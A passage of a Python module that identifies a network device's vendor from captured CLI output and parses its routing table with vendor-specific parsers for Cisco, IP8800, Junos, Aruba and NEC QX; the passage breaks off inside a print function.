abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD"""
# )
# )
# pass
| 777.309524
| 31,669
| 0.64885
| 434
| 32,647
| 48.029954
| 0.142857
| 1.933317
| 2.891053
| 3.84284
| 0.971936
| 0.971936
| 0.969633
| 0.969633
| 0.969633
| 0.969633
| 0
| 0.101967
| 0.017398
| 32,647
| 41
| 31,670
| 796.268293
| 0.547835
| 0.985297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 16
|
6c735644facc86bc372f7ae36a57a7daac7de028
| 103
|
py
|
Python
|
python/learn/base/module/l1/pack/big/b3.py
|
qrsforever/workspace
|
53c7ce7ca7da62c9fbb3d991ae9e4e34d07ece5f
|
[
"MIT"
] | 2
|
2017-06-07T03:20:42.000Z
|
2020-01-07T09:14:26.000Z
|
python/learn/base/module/l1/pack/big/b3.py
|
qrsforever/workspace
|
53c7ce7ca7da62c9fbb3d991ae9e4e34d07ece5f
|
[
"MIT"
] | null | null | null |
python/learn/base/module/l1/pack/big/b3.py
|
qrsforever/workspace
|
53c7ce7ca7da62c9fbb3d991ae9e4e34d07ece5f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2.7
# Module-level side effect: announces that this module was imported/executed
# (Python 2 print statement; this file is not valid Python 3).
print "run here: pack/big/b3.py"
# Demo helper for the package-import exercise; prints its own location when called.
def b3_fun(): print "function: pack/big/b3.py"
| 17.166667
| 46
| 0.679612
| 20
| 103
| 3.45
| 0.7
| 0.202899
| 0.26087
| 0.318841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 0.116505
| 103
| 5
| 47
| 20.6
| 0.703297
| 0.184466
| 0
| 0
| 0
| 0
| 0.578313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
6c88715fd2ea3799869313088b04841101e4ded7
| 21,402
|
py
|
Python
|
models/invariant_basic.py
|
JiaHe-yogurt/GNN
|
6b6dbc362591b4521e0b437d17ab09c1c879aa75
|
[
"Apache-2.0"
] | null | null | null |
models/invariant_basic.py
|
JiaHe-yogurt/GNN
|
6b6dbc362591b4521e0b437d17ab09c1c879aa75
|
[
"Apache-2.0"
] | null | null | null |
models/invariant_basic.py
|
JiaHe-yogurt/GNN
|
6b6dbc362591b4521e0b437d17ab09c1c879aa75
|
[
"Apache-2.0"
] | null | null | null |
from models.base_model import BaseModel
import layers.equivariant_linear as eq
import layers.layers as layers
import tensorflow.compat.v1 as tf
class invariant_basic(BaseModel):
    """Invariant graph classification network built from equivariant linear layers.

    Depending on ``config.input_order`` the model consumes third-order (A^3) or
    fourth-order (A^4) graph tensors, reduces them with the equivariant layers
    from ``layers.equivariant_linear``, pools to a permutation-invariant
    representation and classifies with fully connected layers (TF1 graph mode).
    """

    def __init__(self, config, data):
        # NOTE(review): BaseModel presumably stores config and creates
        # global_step_tensor (used below) -- confirm in models.base_model.
        super(invariant_basic, self).__init__(config)
        self.data = data
        self.build_model()
        self.init_saver()

    def build_model(self):
        # here you build the tensorflow graph of any model you want and define the loss.
        self.is_training = tf.placeholder(tf.bool)
        # Integer class labels, one per graph in the batch.
        self.labels = tf.placeholder(tf.int32, shape=[None])
        ## for A^3
        if self.config.input_order == 3:
            self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
            net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0], self.graphs1)
            net3d = tf.nn.relu(net3d, name='rel0')
            if self.config.network == 'gnn3':
                # 2d (matrix) branch processed with equi_2_to_2 layers.
                self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
                net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
                                       self.graphs2)
                net2d = tf.nn.relu(net2d, name='rel0')
                for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
                    net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
                                           self.config.architecture2d[layer], net2d)
                    net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
                net2d = layers.diag_offdiag_maxpool(net2d)  # invariant max layer according to the invariant basis
                net = tf.concat([net2d, net3d], axis=1)
            elif self.config.network == 'gnn4':
                # 1d (vector) branch processed with equi_1_to_1 layers.
                self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None])
                net1d = eq.equi_1_to_1('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture1d[0],
                                       self.graphs2)
                net1d = tf.nn.relu(net1d, name='rel0')
                for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
                    # NOTE(review): output width comes from architecture2d while the
                    # input width comes from architecture1d -- looks like a copy-paste
                    # inconsistency; confirm the two lists are meant to stay in sync.
                    net1d = eq.equi_1_to_1('2d_equ%d' % layer, self.config.architecture1d[layer - 1],
                                           self.config.architecture2d[layer], net1d)
                    net1d = tf.nn.relu(net1d, name='2d_rel%d' % layer)
                net1d = tf.reduce_sum(net1d,axis=2)
                net = tf.concat([net1d, net3d], axis=1)
        ## for A^4
        elif self.config.input_order == 4:
            self.graphs1 = tf.placeholder(tf.float32, shape=[None, 1, None, None, None, None])
            net4d = eq.equi_4_to_1('four_equi0', 1, self.config.architecture[0], self.graphs1)
            net4d = tf.nn.relu(net4d, name='rel0')
            self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
            net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
                                   self.graphs2)
            net2d = tf.nn.relu(net2d, name='rel0')
            for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
                net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
                                       self.config.architecture2d[layer], net2d)
                net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
            net2d = layers.diag_offdiag_maxpool(net2d)  # invariant max layer according to the invariant basis
            net = tf.concat([net2d, net4d], axis=1)
        # Classification head.
        # NOTE(review): `net` is only bound when input_order is 3 (with network
        # 'gnn3'/'gnn4') or 4; any other config raises NameError here -- confirm
        # the config space is restricted upstream.
        net = layers.fully_connected(net, self.config.fc[0], "full1")
        net = layers.fully_connected(net, self.config.fc[1], "full2")
        net = layers.fully_connected(net, self.config.num_classes, "full4", activation_fn=None) # original classification
        # net = tf.reshape(layers.fully_connected(net, 1, "fully3", activation_fn=None),(-1,)) # regression
        # define loss function
        with tf.name_scope("loss"):
            self.loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.labels, logits=net))
            self.correct_predictions = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(net, 1, output_type=tf.int32), self.labels), tf.int32))
            self.pred = tf.argmax(net, 1, output_type=tf.int32)
            # self.loss = tf.reduce_sum(tf.losses.mean_squared_error(labels=self.labels, predictions=net)) # regression
            # self.correct_predictions = tf.reduce_sum(tf.losses.mean_squared_error(labels=self.labels, predictions=net)) # regression
            # self.pred = net
        # get learning rate with decay every 20 epochs
        learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * 20)
        # choose optimizer
        if self.config.optimizer == 'momentum':
            self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
        elif self.config.optimizer == 'adam':
            self.optimizer = tf.train.AdamOptimizer(learning_rate)
        # define train step
        self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)

    def init_saver(self):
        # here you initialize the tensorflow saver that will be used in saving the checkpoints.
        self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)

    def get_learning_rate(self, global_step, decay_step):
        """
        helper method to fit the learning rate
        :param global_step: current index into dataset, int
        :param decay_step: decay step, float
        :return: scalar learning-rate tensor with staircase exponential decay, floored at 1e-5
        """
        learning_rate = tf.train.exponential_decay(
            self.config.learning_rate,  # Base learning rate.
            global_step * self.config.batch_size,
            decay_step,
            self.config.decay_rate,  # Decay rate.
            staircase=True)
        learning_rate = tf.maximum(learning_rate, 0.00001)
        return learning_rate
class QM9_invariant_basic(BaseModel):
    """Invariant regression network for QM9.

    Combines 1d, 2d and 3d graph inputs through equivariant layers, pools each
    branch to an invariant summary, concatenates them and regresses a single
    scalar target per graph with an L1 loss (TF1 graph mode).
    """

    def __init__(self, config, data):
        super(QM9_invariant_basic, self).__init__(config)
        self.data = data
        self.build_model()
        self.init_saver()

    def build_model(self):
        # here you build the tensorflow graph of any model you want and define the loss.
        self.is_training = tf.placeholder(tf.bool)
        # NOTE(review): regression targets declared as int32 but compared against
        # float predictions by tf.losses.absolute_difference -- confirm the labels
        # are genuinely integral.
        self.labels = tf.placeholder(tf.int32, shape=[None,1])
        ## for A^3
        self.graphs3 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
        net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0], self.graphs3)
        net3d = tf.nn.relu(net3d, name='rel0')
        # 2d (matrix) branch.
        self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs2d[0].shape[0], None, None])
        net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs2d[0].shape[0], self.config.architecture2d[0],
                               self.graphs2)
        net2d = tf.nn.relu(net2d, name='rel0')
        for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
            net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
                                   self.config.architecture2d[layer], net2d)
            net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
        net2d = layers.diag_offdiag_maxpool(net2d)  # invariant max layer according to the invariant basis
        # 1d (vector) branch.
        self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs1d[0].shape[0], None])
        net1d = eq.equi_1_to_1('1d_equ0', self.data.train_graphs1d[0].shape[0], self.config.architecture1d[0],
                               self.graphs1)
        net1d = tf.nn.relu(net1d, name='rel1')
        for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
            # NOTE(review): input width taken from architecture1d, output width from
            # architecture2d -- confirm the two lists are meant to stay in sync.
            net1d = eq.equi_1_to_1('1d_equ%d' % layer, self.config.architecture1d[layer - 1],
                                   self.config.architecture2d[layer], net1d)
            net1d = tf.nn.relu(net1d, name='1d_rel%d' % layer)
        net1d = tf.reduce_sum(net1d,axis=2)
        # Concatenate the invariant summaries of all three branches.
        net = tf.concat([net1d, net2d, net3d], axis=1)
        net = layers.fully_connected(net, self.config.fc[0], "full1")
        net = layers.fully_connected(net, self.config.fc[1], "full2")
        net = layers.fully_connected(net, 1, "fully3", activation_fn=None) # regression
        # define loss function
        with tf.name_scope("loss"):
            # Per-sample L1 distance; reduced over the batch below.
            distances = tf.losses.absolute_difference(labels=self.labels, predictions=net,
                                                      reduction=tf.losses.Reduction.NONE)
            self.loss = tf.reduce_sum(distances, axis=0)
            self.correct_predictions = tf.reduce_sum(distances, axis=0)
            self.pred = net
        # get learning rate with decay every config.decay_epoch epochs
        learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * self.config.decay_epoch)
        # choose optimizer
        if self.config.optimizer == 'momentum':
            self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
        elif self.config.optimizer == 'adam':
            self.optimizer = tf.train.AdamOptimizer(learning_rate)
        # define train step
        self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)

    def init_saver(self):
        # here you initialize the tensorflow saver that will be used in saving the checkpoints.
        self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)

    def get_learning_rate(self, global_step, decay_step):
        """
        helper method to fit the learning rate
        :param global_step: current index into dataset, int
        :param decay_step: decay step, float
        :return: scalar learning-rate tensor with staircase exponential decay, floored at 1e-5
        """
        learning_rate = tf.train.exponential_decay(
            self.config.learning_rate,  # Base learning rate.
            global_step * self.config.batch_size,
            decay_step,
            self.config.decay_rate,  # Decay rate.
            staircase=True)
        learning_rate = tf.maximum(learning_rate, 0.00001)
        return learning_rate
class QM9_invariant_basic2(BaseModel):
    """Variant of QM9_invariant_basic with cross-order mixing layers.

    In addition to the plain 1d/2d/3d branches it mixes orders with
    equi_1_to_2 (1d features lifted into the 2d branch) and equi_2_to_1
    (a slice of the 2d input folded into the 1d branch) before the
    invariant pooling and regression head (TF1 graph mode).
    """

    def __init__(self, config, data):
        super(QM9_invariant_basic2, self).__init__(config)
        self.data = data
        self.build_model()
        self.init_saver()

    def build_model(self):
        # here you build the tensorflow graph of any model you want and define the loss.
        self.is_training = tf.placeholder(tf.bool)
        # NOTE(review): int32 regression targets compared against float predictions
        # by tf.losses.absolute_difference -- confirm labels are integral.
        self.labels = tf.placeholder(tf.int32, shape=[None,1])
        ## for A^3
        self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs1d[0].shape[0], None])
        self.graphs3 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
        net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0],
                               self.graphs3)
        net3d = tf.nn.relu(net3d, name='rel3d')
        self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs2d[0].shape[0], None, None])
        net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs2d[0].shape[0], self.config.architecture2d[0],
                               self.graphs2)
        net2d = tf.nn.relu(net2d, name='rel2d')
        for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
            net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
                                   self.config.architecture2d[layer], net2d)
            net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
        # Lift the 1d input into the 2d branch and concatenate before pooling.
        net122 = eq.equi_1_to_2('122', self.data.train_graphs1d[0].shape[0], self.config.architecture1d[0], self.graphs1)
        net122 = tf.nn.relu(net122, name='rel122')
        net2d = tf.concat([net2d, net122], axis=1)
        net2d = layers.diag_offdiag_maxpool(net2d)  # invariant max layer according to the invariant basis
        # NOTE(review): the hard-coded input width 4 and the slice graphs2[:, 2:, :, :]
        # look dataset-specific -- confirm against the QM9 feature layout.
        net221 = eq.equi_2_to_1('221', 4, self.config.architecture2d[0], self.graphs2[:,2:, :,:])
        net221 = tf.nn.relu(net221, name = 'relu221')
        net1d = eq.equi_1_to_1('1d_equ0', self.data.train_graphs1d[0].shape[0], self.config.architecture1d[0],
                               self.graphs1)
        net1d = tf.nn.relu(net1d, name='rel1')
        for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
            net1d = eq.equi_1_to_1('1d_equ%d' % layer, self.config.architecture1d[layer - 1],
                                   self.config.architecture2d[layer], net1d)
            net1d = tf.nn.relu(net1d, name='1d_rel%d' % layer)
        # Fold the 2d->1d features into the 1d branch, then sum out the node axis.
        net1d = tf.concat([net1d, net221], axis=1)
        net1d = tf.reduce_sum(net1d, axis=2)
        net = tf.concat([net1d, net2d, net3d], axis=1)
        net = layers.fully_connected(net, self.config.fc[0], "full1")
        net = layers.fully_connected(net, self.config.fc[1], "full2")
        net = layers.fully_connected(net, self.config.fc[1], "full3")
        net = layers.fully_connected(net, 1, "fully4", activation_fn=None) # regression
        # define loss function
        with tf.name_scope("loss"):
            # Per-sample L1 distance; reduced over the batch below.
            distances = tf.losses.absolute_difference(labels=self.labels, predictions=net,
                                                      reduction=tf.losses.Reduction.NONE)
            self.loss = tf.reduce_sum(distances, axis=0)
            self.correct_predictions = tf.reduce_sum(distances, axis=0)
            self.pred = net
        # get learning rate with decay every config.decay_epoch epochs
        learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * self.config.decay_epoch)
        # choose optimizer
        if self.config.optimizer == 'momentum':
            self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
        elif self.config.optimizer == 'adam':
            self.optimizer = tf.train.AdamOptimizer(learning_rate)
        # define train step
        self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)

    def init_saver(self):
        # here you initialize the tensorflow saver that will be used in saving the checkpoints.
        self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)

    def get_learning_rate(self, global_step, decay_step):
        """
        helper method to fit the learning rate
        :param global_step: current index into dataset, int
        :param decay_step: decay step, float
        :return: scalar learning-rate tensor with staircase exponential decay, floored at 1e-5
        """
        learning_rate = tf.train.exponential_decay(
            self.config.learning_rate,  # Base learning rate.
            global_step * self.config.batch_size,
            decay_step,
            self.config.decay_rate,  # Decay rate.
            staircase=True)
        learning_rate = tf.maximum(learning_rate, 0.00001)
        return learning_rate
class QM9_invariant_basic_gnn3(BaseModel):
    """Regression twin of ``invariant_basic``.

    Same config-driven branch structure (A^3 with 'gnn3'/'gnn4', or A^4) as
    invariant_basic, but with a single-output regression head and an L1 loss
    instead of the softmax classification head (TF1 graph mode).
    """

    def __init__(self, config, data):
        super(QM9_invariant_basic_gnn3, self).__init__(config)
        self.data = data
        self.build_model()
        self.init_saver()

    def build_model(self):
        # here you build the tensorflow graph of any model you want and define the loss.
        self.is_training = tf.placeholder(tf.bool)
        # NOTE(review): int32 regression targets compared against float predictions
        # by tf.losses.absolute_difference -- confirm labels are integral.
        self.labels = tf.placeholder(tf.int32, shape=[None,1])
        ## for A^3
        if self.config.input_order == 3:
            self.graphs1 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs3d[0].shape[0], None, None, None])
            net3d = eq.equi_3_to_1('tri_equi0', self.data.train_graphs3d[0].shape[0], self.config.architecture3d[0], self.graphs1)
            net3d = tf.nn.relu(net3d, name='rel0')
            if self.config.network == 'gnn3':
                # 2d (matrix) branch processed with equi_2_to_2 layers.
                self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
                net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
                                       self.graphs2)
                net2d = tf.nn.relu(net2d, name='rel0')
                for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
                    net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
                                           self.config.architecture2d[layer], net2d)
                    net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
                net2d = layers.diag_offdiag_maxpool(net2d)  # invariant max layer according to the invariant basis
                net = tf.concat([net2d, net3d], axis=1)
            elif self.config.network == 'gnn4':
                # 1d (vector) branch processed with equi_1_to_1 layers.
                self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None])
                net1d = eq.equi_1_to_1('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture1d[0],
                                       self.graphs2)
                net1d = tf.nn.relu(net1d, name='rel0')
                for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
                    # NOTE(review): output width from architecture2d, input width from
                    # architecture1d -- confirm the two lists are meant to stay in sync.
                    net1d = eq.equi_1_to_1('2d_equ%d' % layer, self.config.architecture1d[layer - 1],
                                           self.config.architecture2d[layer], net1d)
                    net1d = tf.nn.relu(net1d, name='2d_rel%d' % layer)
                net1d = tf.reduce_sum(net1d,axis=2)
                net = tf.concat([net1d, net3d], axis=1)
        ## for A^4
        elif self.config.input_order == 4:
            self.graphs1 = tf.placeholder(tf.float32, shape=[None, 1, None, None, None, None])
            net4d = eq.equi_4_to_1('four_equi0', 1, self.config.architecture[0], self.graphs1)
            net4d = tf.nn.relu(net4d, name='rel0')
            self.graphs2 = tf.placeholder(tf.float32, shape=[None, self.data.train_graphs[0].shape[0], None, None])
            net2d = eq.equi_2_to_2('2d_equ0', self.data.train_graphs[0].shape[0], self.config.architecture2d[0],
                                   self.graphs2)
            net2d = tf.nn.relu(net2d, name='rel0')
            for layer in range(1, len(self.config.architecture2d)):  # architecture is # of features of each layers
                net2d = eq.equi_2_to_2('2d_equ%d' % layer, self.config.architecture2d[layer - 1],
                                       self.config.architecture2d[layer], net2d)
                net2d = tf.nn.relu(net2d, name='2d_rel%d' % layer)
            net2d = layers.diag_offdiag_maxpool(net2d)  # invariant max layer according to the invariant basis
            net = tf.concat([net2d, net4d], axis=1)
        # Regression head (single scalar per graph).
        # NOTE(review): `net` is only bound for the config combinations above;
        # other configs raise NameError here.
        net = layers.fully_connected(net, self.config.fc[0], "full1")
        net = layers.fully_connected(net, self.config.fc[1], "full2")
        net = layers.fully_connected(net, 1, "fully3", activation_fn=None) # regression
        # define loss function
        with tf.name_scope("loss"):
            # Per-sample L1 distance; reduced over the batch below.
            distances = tf.losses.absolute_difference(labels=self.labels, predictions=net,
                                                      reduction=tf.losses.Reduction.NONE)
            self.loss = tf.reduce_sum(distances, axis=0)
            self.correct_predictions = tf.reduce_sum(distances, axis=0)
            self.pred = net
        learning_rate = self.get_learning_rate(self.global_step_tensor, self.data.train_size * 20)
        # choose optimizer
        if self.config.optimizer == 'momentum':
            self.optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=self.config.momentum)
        elif self.config.optimizer == 'adam':
            self.optimizer = tf.train.AdamOptimizer(learning_rate)
        # define train step
        self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step_tensor)

    def init_saver(self):
        # here you initialize the tensorflow saver that will be used in saving the checkpoints.
        self.saver = tf.train.Saver(max_to_keep=self.config.max_to_keep)

    def get_learning_rate(self, global_step, decay_step):
        """
        helper method to fit the learning rate
        :param global_step: current index into dataset, int
        :param decay_step: decay step, float
        :return: scalar learning-rate tensor with staircase exponential decay, floored at 1e-5
        """
        learning_rate = tf.train.exponential_decay(
            self.config.learning_rate,  # Base learning rate.
            global_step * self.config.batch_size,
            decay_step,
            self.config.decay_rate,  # Decay rate.
            staircase=True)
        learning_rate = tf.maximum(learning_rate, 0.00001)
        return learning_rate
| 55.302326
| 142
| 0.620783
| 2,814
| 21,402
| 4.571429
| 0.074272
| 0.077736
| 0.033349
| 0.027363
| 0.962764
| 0.962764
| 0.955924
| 0.951803
| 0.951803
| 0.931748
| 0
| 0.040698
| 0.264087
| 21,402
| 386
| 143
| 55.445596
| 0.776063
| 0.141576
| 0
| 0.890511
| 0
| 0
| 0.028668
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058394
| false
| 0
| 0.014599
| 0
| 0.10219
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66bb6392fe5b37f8bf8b51fb7e2dd3bda8ef4d01
| 12,896
|
py
|
Python
|
commonLib/lib_routetable.py
|
NobuyukiInoue/pyReadShowIpRoute
|
3c83a3ede01b4fcb7fc801dae03366a694a244ab
|
[
"MIT"
] | null | null | null |
commonLib/lib_routetable.py
|
NobuyukiInoue/pyReadShowIpRoute
|
3c83a3ede01b4fcb7fc801dae03366a694a244ab
|
[
"MIT"
] | null | null | null |
commonLib/lib_routetable.py
|
NobuyukiInoue/pyReadShowIpRoute
|
3c83a3ede01b4fcb7fc801dae03366a694a244ab
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from typing import List, Dict, Tuple
from . import lib_common
from . import lib_contents_to_list
def model_judgment(filename_path: str, contents: List[str]) -> str:
    """Guess the device model from captured CLI output.

    Probes *contents* for the output of several vendor-specific routing-table
    commands and returns one of "cisco", "cisco_vrf", "ip8800", "ip8800_vrf",
    "aruba", "junos", "qx" -- or None when nothing matches or *contents* is None.

    :param filename_path: path of the capture file (unused here, kept for API symmetry)
    :param contents: lines of the capture file, or None
    """
    if contents is None:
        # BUG FIX: previously returned a 3-tuple (None, None, None) -- a
        # copy-paste from get_ip_route_result -- while every other path
        # returns a str or None.
        return None
    prompt_char = ["#", "> ", ">"]
    enable_perfect_match = True
    # for Cisco
    target_command = "show ip route vrf *"
    contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
    if len(contents_target_command) > 1 and "Load for five secs:" in contents_target_command[1]:
        for line in contents_target_command:
            if "Routing Table:" in line:
                return "cisco_vrf"
        return "cisco"
    # for IP8800
    target_command = "show ip route vrf all"
    contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
    if len(contents_target_command) > 1 and "Date " in contents_target_command[1]:
        for line in contents_target_command:
            if "VRF:" in line:
                return "ip8800_vrf"
        return "ip8800"
    # Cisco or IP8800 or HPE Aruba
    target_command = "show ip route"
    contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
    if len(contents_target_command) > 1:
        if "Load for five secs:" in contents_target_command[1] \
           or "Codes:" in contents_target_command[1]:
            # for Cisco
            for line in contents_target_command:
                if "Routing Table:" in line:
                    return "cisco_vrf"
            return "cisco"
        if "Date " in contents_target_command[1]:
            # for IP8800
            for line in contents_target_command:
                if "VRF:" in line:
                    return "ip8800_vrf"
            return "ip8800"
        else:
            # for HPE Aruba
            for line in contents_target_command:
                if "IP Route Entries" in line:
                    return "aruba"
    # for Junos
    target_command = "show route terse"
    contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
    if len(contents_target_command) > 0:
        for line in contents_target_command:
            if "A V Destination" in line:
                return "junos"
    # for NEC QX
    target_command = "display ip routing-table"
    contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
    if len(contents_target_command) > 1 and "Routing Tables:" in contents_target_command[1]:
        return "qx"
    return None
def get_ip_route_result(filename_path: str, modelName: str, contents: List[str], enable_print: bool, enable_exit: bool) -> Tuple[List[List[str]], str, List[str]]:
    """Extract and parse the routing table for the given device model.

    Looks up the model-specific CLI command and parser, extracts the command's
    output from *contents* and parses it into a route table.

    :param filename_path: path of the capture file (used for messages/parsing context)
    :param modelName: one of the keys returned by model_judgment()
    :param contents: lines of the capture file
    :param enable_print: when True, echo the extracted command output
    :param enable_exit: forwarded to the parser (its abort-on-error flag)
    :return: (table, target_command, extracted lines), or (None, None, None)
             when *modelName* is unknown.

    Refactored from seven copy-pasted branches (whose comments had drifted out
    of sync with their commands) into a single dispatch table; behavior is
    unchanged.
    """
    prompt_char = ["#", "> ", ">"]
    enable_perfect_match = True
    # modelName -> (CLI command to extract, name of the parser in lib_contents_to_list).
    # Parser names are kept as strings and resolved lazily so the unknown-model
    # path never touches lib_contents_to_list.
    dispatch = {
        "cisco": ("show ip route", "for_Cisco"),
        "cisco_vrf": ("show ip route vrf *", "for_Cisco"),
        "ip8800": ("show ip route", "for_IP8800"),
        "ip8800_vrf": ("show ip route vrf all", "for_IP8800"),
        "junos": ("show route terse", "for_Junos"),
        "aruba": ("show ip route", "for_Aruba"),
        "qx": ("display ip routing-table", "for_QX"),
    }
    if modelName not in dispatch:
        print("modelName {0} not defined.".format(modelName))
        return None, None, None
    target_command, parser_name = dispatch[modelName]
    contents_target_command, _ = lib_common.get_contents_target_command(contents, target_command, prompt_char, enable_perfect_match)
    if enable_print:
        # Print execution result of target_command.
        lib_common.print_contents_target_command(filename_path, contents_target_command)
    # Store the execution result of target_command in the list.
    parser = getattr(lib_contents_to_list, parser_name)
    table = parser(filename_path, contents_target_command, enable_exit)
    return table, target_command, contents_target_command
def print_table(modelName: str, filename_path: str, table: Dict[str, List[List[str]]], enable_sort: bool):
    """
    print table

    Prints one banner plus one formatted route listing per vrf.
    (Annotation fixed: the code iterates ``table.items()``, so *table* is a
